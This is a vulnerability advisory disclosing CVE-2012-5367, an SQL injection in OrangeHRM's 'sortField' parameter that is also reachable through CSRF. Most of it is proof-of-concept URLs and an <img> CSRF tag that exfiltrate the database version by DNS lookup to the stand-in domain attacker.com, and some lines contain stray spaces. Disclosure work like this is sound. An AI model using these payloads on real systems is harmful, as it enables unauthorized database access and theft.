SQL Injection Vulnerability in OrangeHRM

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in OrangeHRM, which could be exploited to alter SQL requests to application’s database.

1. SQL Injection Vulnerability in Orange HRM: CVE-2012-5367
   The vulnerability was discovered in the “/symfony/web/index.php” script while handling the “sortField” HTTP GET parameter.
   Successful exploitation of this vulnerability requires administrative privileges, however it can be exploited by a non-authenticated user via CSRF vector, as the above-mentioned script is also vulnerable to CSRF attack.
   The vulnerability could be triggered by accessing the following URIs:
   /symfony/web/index.php/admin/viewCustomers
   /symfony/web/index.php/admin/vie wPayGrades
   /symfony/web/index.php/admin/viewPayGrades
   The PoC codes below are based on DNS Exfiltration technique and can be used in cases when application’s database is hosted on a Windows system. The PoCs will send a DNS request demanding IP addess for version() (or any other sensitive information from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):

1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortFi eld=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

The following PoC demonstrates exploitation of the vulnerability via CSRF vector:
<img src=“http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&s ortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))”>

1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortFi eld=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sort Field=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))